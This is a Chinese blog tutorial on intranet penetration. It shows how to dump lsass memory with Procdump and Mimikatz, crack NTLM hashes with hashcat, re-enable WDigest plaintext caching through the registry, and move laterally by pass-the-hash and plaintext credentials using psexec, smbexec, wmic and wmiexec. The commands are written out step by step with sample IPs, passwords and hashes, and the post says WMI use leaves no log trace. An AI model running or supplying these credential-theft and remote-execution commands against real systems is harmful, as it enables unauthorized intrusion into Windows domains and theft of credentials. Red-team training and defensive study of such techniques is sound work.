【内网渗透】域横向smb&wmi明文或hash传递

最新推荐文章于 2024-05-17 15:33:57 发布
最新推荐文章于 2024-05-17 15:33:57 发布
阅读量1.3k 收藏 7
点赞数 3
分类专栏: 内网渗透 文章标签: 内网渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44032232/article/details/114480116
版权

目录

0x001 Procdump+Mimikatz配合获取用户信息

Mimikatz属于第三方软件,直接上传到目标主机可能被杀毒软件查杀,这时我们可以配合官方软件Procdump,将Procdump上传目标主机获取用户信息(该文件不可读),使用本地的Mimikatz打开Procdump获取的用户信息。

Procdump下载:https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump

# procdump 在目标机上执行
procdump -accepteula -ma lsass.exe lsass.dmp

# mimikatz 在本地执行:
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full

0x002 无法获取明文密码解决方案

Windows2012以上版本默认关闭wdigest,攻击者无法从内存中获取明文密码
Windows2012以下版本如安装KB2871997补丁,同样也会导致无法获取明文密码

针对以上情况,我们提供了4种方式解决此类问题

  • 1.利用哈希hash传递(pth,ptk等)进行移动
  • 2.利用其它服务协议(SMB,WMI等)进行哈希移动
  • 3.利用注册表操作开启Wdigest Auth值进行获取
  • 4.利用工具或第三方平台(Hachcat)进行破解获取
1)hashcat暴力破解

Windows系统LM HashNTLM Hash加密算法,个人系统在Windows vista后,服务器系统在Windows 2003以后,认证方式均为NTLM Hash

hashcat -a 0 -m 1000 hash file --force

破解工具:https://github.com/hashcat/hashcat
更多参考:https://www.freebuf.com/sectool/164507.html

2)注册表操作开启Wdigest Auth值
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
3)SMB服务协议进行哈希移动

利用SMB服务可以通过明文或hash传递来远程执行,条件445服务端口开放

# psexec第一种:先有ipc链接,psexec需要明文或hash传递
net use \\192.168.3.32\ipc$ "admin!@#45" /user:administrator
psexec \\192.168.3.32 -s cmd # 需要先有ipc链接 -s以System权限运行

# psexec第二种:不用建立IPC直接提供明文账户密码
psexec \\192.168.3.21 -u administrator -p Admin12345 -s cmd 
psexec -hashes :$HASH$ ./administrator@10.1.2.3
psexec -hashes :$HASH$ domain/administrator@10.1.2.3
psexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32  // 实际操作中连接不上
// 以上两种方式使用的官方Pstools内的工具    

# smbexec第三种:无需先ipc链接 明文或hash传递  非官方自带-参考impacket工具包使用,操作简单,容易被杀
smbexec god/administrator:Admin12345@192.168.3.21
smbexec ./administrator:admin!@#45@192.168.3.32
smbexec -hashes :$HASH$ ./admin@192.168.3.21
smbbexec -hashes :$HASH$ domain/admin@192.168.3.21
smbexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32
smbexec -hashes :ccef208c6485269c20db2cad21734fe7 god/administrator@192.168.3.21

Pstools官方工具包:https://docs.microsoft.com/en-us/sysinternals/downloads/pstools

impacket工具包下载:https://gitee.com/RichChigga/impacket-examples-windows

4)WMI服务利用-cscript,wmiexec,wmic

WMI(Windows Management Instrumentation) 是通过135端口进行利用,支持用户名明文或者hash的方式进行认证,并且该方法不会在目标日志系统留下痕迹。

# 自带WMIC命令 明文传递 无回显   
wmic /node:192.168.3.21 /user:administrator /password:Admin12345 process call create "cmd.exe /c  ipconfig >C:\1.txt"

# 自带cscript配合wmiexec.vbs脚本 明文传递 有回显
cscript //nologo wmiexec.vbs /shell 192.168.3.21 administrator Admin12345

# 第三方套件impacket wmiexec  明文或hash传递 有回显exe版本  容易被杀软查杀
wmiexec ./administrator:admin!@#45@192.168.3.32 "whoami"
wmiexec god/administrator:Admin12345@192.168.3.21 "whoami"
wmiexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32 "whoami"
wmiexec -hashes :ccef208c6485269c20db2cad21734fe7 god/administrator@192.168.3.21 "whoami"

wmiexec.vbs脚本下载:https://www.secpulse.com/wp-content/uploads/2015/05/cache-a360611dc24d240989799c29c555e4b7_wmiexec-v1_1.rar

参考文章:http://www.91ri.org/12908.html

多学点技术
关注
  • 3
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
红队内攻防渗透:内渗透之内对抗:横向移动篇&入口切换&SMB共享&WMI管道&DCOM组件&Impacket套件&CS插件
HACKONE的博客
06-22 467
因此在内渗透中,我们可以使用WMI进行横向移动,支持用户名文或hash的方式进行认证,并且该方法不会在目标日志系统留下痕迹。SMB服务通常由文件服务器提供,它允许客户端计算机通过络访问服务器上的共享资源。通过SMB用户可以在络上访问和共享文件夹、文件以及打印机,从而实现在不同计算机之间方便地共享数据和打印输出。它支持不同的两台机器上的组件间的通信,不论它们是运行在局、广、还是Internet上。这里ping 3.32 是能ping通的 所以防火墙入站规则是关闭的,可以执行正向shell。
渗透测试 _ 内信息收集1
08-03
渗透测试】是一种安全测试方法,旨在模拟黑客攻击行为,以发现并评估计算机络或系统的安全性。内信息收集是渗透测试的重要阶段,它决定了测试的效率和成功率。本文主要探讨了内信息收集的基本概念和方法。 ...
【内安全】横向smb&wmi文或hash传递
_Co1a
09-12 1078
下面讲的是psexec&smbexec以及wimc&wmiexec 知识点1: windows2012以上版本默认关闭wdigest,攻击者无法从内存中获取文密码 windows2012以下版本如安装KB2871997补丁,同样也会导致无法获取文密码 针对以上情况,提供了4钟方式解决此类问题 1.利用哈希hash传递(pth,ptk等)进行移动 2.利用其它服务协议(SMB,WMI等)进行哈希移动 3.利用注册表操作开启wdigest Auth值进行...
第67天-内安全-横向smb&wmi文或hash传递
MCTSOG的博客
05-12 973
思维导图 知识点 无法获取文密码: Windows2012以上版本默认关闭wdigest,攻击者无法从内存中获取文密码 Windows2012以下版本若安装KB2871997补丁,同样也会导致无法获取文密码 针对以上情况,我们提供了4种方式解决此类问题 1.利用哈希hash传递(pth,ptk等)进行移动 2.利用其它服务协议(SMB,WMI等)进行哈希移动 3.利用注册表操作开启Wdigest Auth值进行获取 注册表操作开启Wdigest Auth值 reg add HKL
安全-横向smb&wmi文或hash传递
xhscxj的博客
03-11 3751
知识点1: Windows2012以上版本默认关闭wdigest,攻击者无法从内存中获取文密码 Windows2012以下版本如安装KB2871997补丁,同样也会导致无法获取文密码 针对以上情况,我们提供了4种方式解决此类问题 1.利用哈希hash传递(path,ptk等)进行移动 2.利用其他服务协议(SMB,WMI等)进行哈希移动 3.利用注册表操作开启Wdigest Auth值进行获取 4.利用工具或第三方平台(Hachcat)进行破解获取 ...
渗透——哈希传递、黄金票据
希望我的博客,能帮上你解决学习中工作中所遇到的问题
06-30 850
渗透 1. 安装 接着点击安装向导 加入: 需要设置dns服务器为控机 控可以登陆任意中的电脑 Windows认证协议 - Kerberos,也可以叫做票据 我们查看控 在cmd输入 net user /domain 还可以在dns里查看,一般dns都是控机 当我们获取到了administator的权限的时候,我们可以利用windows官方的工具去提权 指令: psexec -i -d -s cmd.exe//获取权限 然后再次输入net user /domain,就可以获取
安全:横向传递攻击(SMB || WMI 文或 hash 传递
网络安全领域___专研者.
06-09 2690
横向移动就是在拿下对方一台主机后,以拿下的那台主机作为跳板,对内的其他主机再进行后面渗透,利用既有的资源尝试获取更多的凭据、更高的权限,一步一步拿下更多的主机,进而达到控制整个内、获取到最高权限、发动高级持续性威胁攻击的目的.(传递攻击主要建立在文和Hash值获取基础上进行攻击.)
C#实例 实现WMI连接目标,运行命令与获取计算机信息并能打开对方SMB同时实现连接并完成文件传输一整套解决方案 附Log4Net日志
03-01
C#实例 实现WMI连接目标,运行命令与查询状态并能打开对方SMB同时实现连接并完成文件传输一整套解决方案 附Log4Net日志 此实例完整演示了如何连接135RPC服务,即WMI服务,实现功能: 1、远程获取计算机信息 2、执行...
经验之绕过杀软之MOF的利用
11-25
渗透过程中,绕过杀软是至关重要的技术环节,以确保操作的隐蔽性和持久性。MOF(Managed Object Format)文件在这种场景下被利用,主要用于权限维持和提权。MOF是WMI(Windows Management Instrumentation)...
第一百零八课:跨平台横向移动 [wmi利用]1
08-03
虽然WMI本身是Windows特有的,但攻击者可能通过模拟WMI协议或利用其他方式在非Windows系统上实现类似的功能,以达到横向移动的目的。 【总结】 WMI是Windows系统管理和自动化的重要工具,同时也是安全领中攻击者...
WMI StdRegProv 通过wmi操作注册表的vbscript实现代码 (本地或远程)
09-05
WMI StdRegProv 通过wmi操作注册表的vbscript实现代码 (本地或远程),需要的朋友可以参考下。
横向移动 -基于smb&wmi 文或 hash 传递
mingyqf的博客
11-10 801
横向 smb&wmi 文或 hash 传递 演示案例:  Procdump+Mimikatz 配合获取  Hashcat 破解获取 Windows NTML Hash横向移动 SMB 服务利用-psexec,smbexec  横向移动 WMI 服务利用-cscript,wmiexec,wmic  横向移动以上服务 hash 批量利用-python 编译 exe 案例 1-Procdump+Mimikatz 配合获取 1.1procdump 配合 mimikatz
渗透之wmi协议进行密码或hash传递
最新发布
qq_55202378的博客
05-17 272
wmi服务是比smb服务更高级一些的,在日志中是找不到痕迹的,但是这个主要是传递管理员的用户凭据。
哈希传递常用方法
路虽远,行将至。事虽难,做必达。
05-13 541
随着人们的安全意识逐渐增强,企业内的服务器弱口令也逐渐减少,密码复杂度提高,当我们获取到服务器权限后,可以提取出用户密码hash,但多数情况下显然是难以解密出文密码。这时候就需要用到内hash传递技术了。哈希传递利用了NTLM认证机制的缺陷,可以直接利用密码hash值来进行NTLM认证。如果目标主机与我们提取到密码hash值的机器密码相同时,便可直接使用hash值来远程登录目标主机。
哈希传递攻击(Pass-the-Hash
热门推荐
whoim_i的博客
12-25 1万+
目录使用msf进行哈希传递攻击使用mimikatz进行哈希传递攻击PTH(工作组) 使用msf进行哈希传递攻击 有些时候,当我们获取到了某台主机的Administrator用户的LM-Hash和 NTLM-Hash ,并且该主机的445端口(文件共享)打开着。我们则可以利用 exploit/windows/smb/psexec 漏洞用MSF进行远程登录(哈希传递攻击)。(注意:只能是adminis...
WMI使用学习笔记
crowsec
10-21 3884
本文大量参考了师傅们的文章,感谢各位师傅的帮助! WMI的全名为"Windows Management Instrumentation"。 从win98开始,Windows操作系统都支持WMI,WMI可以在本地或者远程管理计算机系统。比如:重启,关机,关闭进程,创建进程等。
渗透横向移动wmi&smb&密码喷射CrackMapExec
m0_62207170的博客
04-22 1735
渗透横向移动wmi&smb&密码喷射CrackMapExec
渗透-横向smb&wminhash传递
weixin_60329395的博客
08-09 1731
该工具可配合minikatz进行文获取,minikatz被查杀的情况下可使用tips:该工具为微软官方工具,不会被查杀Procdump下载地址:https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump下载成功后 导入到目标主机 使用CMD命令进行以下命令进行执行即使用该工具生成一个该主机的密码文件 执行成功,自动生成了一个lsass.dmp的文件 将该dmp文件放到自己本机上使用minikatz进行执行tips:将dmp文件放进min
67 内安全-横向smb&wmi文或hash传递
山兔的博客
10-30 424
这个站搭建出来之后,你入侵的是站对应的服务器,与里面的关系不大,所以我们提权也是system,站是对外的,你提权也是它本机,它只是说属于内的一台主机,以他来跳板,所以本机肯定是system权限,这和用户没关系的,用户只是上面新建的用户用来登录里面进行操作的,和那个站没关系的,这个服务器扮演的角色是服务器,它上面有它本地用户、内的用户,它操作它用户,就是对它内用户进行操作,然后站跟它没关系,你站攻击下来,获取的也只是system权限,然后你在探针它电脑的信息,就这样子。
如何解决WMI 服务或 WM! 提供程宇返回未知错误:HRESULT 0x80070964
05-25
这个错误通常与 WMI(Windows Management Instrumentation)服务相关,可能是 WMI 子系统或命名空间出现了问题。以下是一些可能的解决方法: 1. 重新启动 WMI 服务 在 Windows 搜索栏中输入“services.msc”,找到“Windows Management Instrumentation”服务,右键单击并选择“重启”。 2. 重置 WMI 服务 打开命令提示符(以管理员身份运行),输入以下命令并按回车键: ``` winmgmt /resetrepository ``` 这将重置 WMI 子系统的状态并重新构建 WMI 数据存储库。 3. 修复 WMI 子系统 打开命令提示符(以管理员身份运行),输入以下命令并按回车键: ``` winmgmt /salvagerepository %windir%\System32\wbem ``` 这将尝试修复损坏的 WMI 子系统文件,并将它们移动到重建存储库所需的位置。 4. 重新注册 WMI DLL 文件 打开命令提示符(以管理员身份运行),输入以下命令并按回车键: ``` regsvr32 wbemcons.dll regsvr32 wbemcore.dll regsvr32 wbemess.dll regsvr32 wbemsvc.dll regsvr32 fastprox.dll regsvr32 winmgmts.exe ``` 这将重新注册 WMI DLL 文件,可能会解决问题。 5. 运行系统文件检查器 打开命令提示符(以管理员身份运行),输入以下命令并按回车键: ``` sfc /scannow ``` 这将运行系统文件检查器,并尝试修复任何受损的系统文件。 如果上述解决方法都无法解决问题,可能需要重新安装操作系统或寻求专业技术支持。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

多学点技术

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值